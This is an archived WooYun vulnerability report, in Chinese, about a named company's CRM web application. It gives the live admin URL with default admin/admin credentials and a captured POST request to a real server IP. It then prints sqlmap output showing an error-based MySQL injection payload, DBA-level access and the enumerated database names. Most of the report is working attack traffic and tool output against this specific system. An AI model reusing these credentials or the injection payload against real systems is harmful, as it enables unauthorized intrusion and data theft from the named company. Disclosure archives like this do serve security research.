乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-09: 细节已通知厂商并且等待厂商处理中 2015-11-22: 厂商已经主动忽略漏洞,细节向公众公开
23333333
http://crm.17chang.com/账号:admin密码:admin
后台 sql 防注入根本没开 随便抓了个包 跑了下POST数据包:
POST /crm-server/rest/userservice/users/query HTTP/1.1Host: 121.40.218.177:8080User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0Accept: application/json, text/javascript, */*; q=0.01Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Content-Type: application/json; charset=utf-8Referer: http://crm.17chang.com/content.htmlContent-Length: 116Origin: http://crm.17chang.comConnection: keep-alivePragma: no-cacheCache-Control: no-cache{"area_equals":"","city_equals":"","title_equals":"","username_like":"*","phonenum_equals":"","enabled_equals":null}
然后看了下 当前权限 竟然是 DBA!!!!
(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:---Parameter: #1* ((custom) POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: {"area_equals":"","city_equals":"","title_equals":"","username_like":"' AND (SELECT 3255 FROM(SELECT COUNT(*),CONCAT(0x71707a7871,(SELECT (ELT(3255=3255,1))),0x717a787171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rNlG'='rNlG","phonenum_equals":"","enabled_equals":null}---[14:22:37] [WARNING] changes made by tampering scripts are not included in shown payload content(s)[14:22:37] [INFO] the back-end DBMS is MySQLback-end DBMS: MySQL 5.0[14:22:37] [INFO] fetching database names[14:22:37] [INFO] the SQL query used returns 10 entries[14:22:37] [INFO] starting 10 threads[14:22:38] [INFO] retrieved: mysql[14:22:38] [INFO] retrieved: test[14:22:38] [INFO] retrieved: oms_dev[14:22:38] [INFO] retrieved: mlm_dev[14:22:38] [INFO] retrieved: information_schema[14:22:38] [INFO] retrieved: crm_dev[14:22:38] [INFO] retrieved: pms_dev[14:22:38] [INFO] retrieved: yqc[14:22:38] [INFO] retrieved: yqc_test[14:22:38] [INFO] retrieved: yqc_initdataavailable databases [10]:[*] crm_dev[*] information_schema[*] mlm_dev[*] mysql[*] oms_dev[*] pms_dev[*] test[*] yqc[*] yqc_initdata[*] yqc_test[14:22:38] [WARNING] HTTP error codes detected during run:500 (Internal Server Error) - 3 times[14:22:38] [INFO] fetched data logged to text files under 'C:\Users\Administrator\.sqlmap\output\121.40.218.177'[*] shutting down at 14:22:38
危害等级:无影响厂商忽略
忽略时间:2015-11-22 13:34
漏洞Rank:4 (WooYun评价)
暂无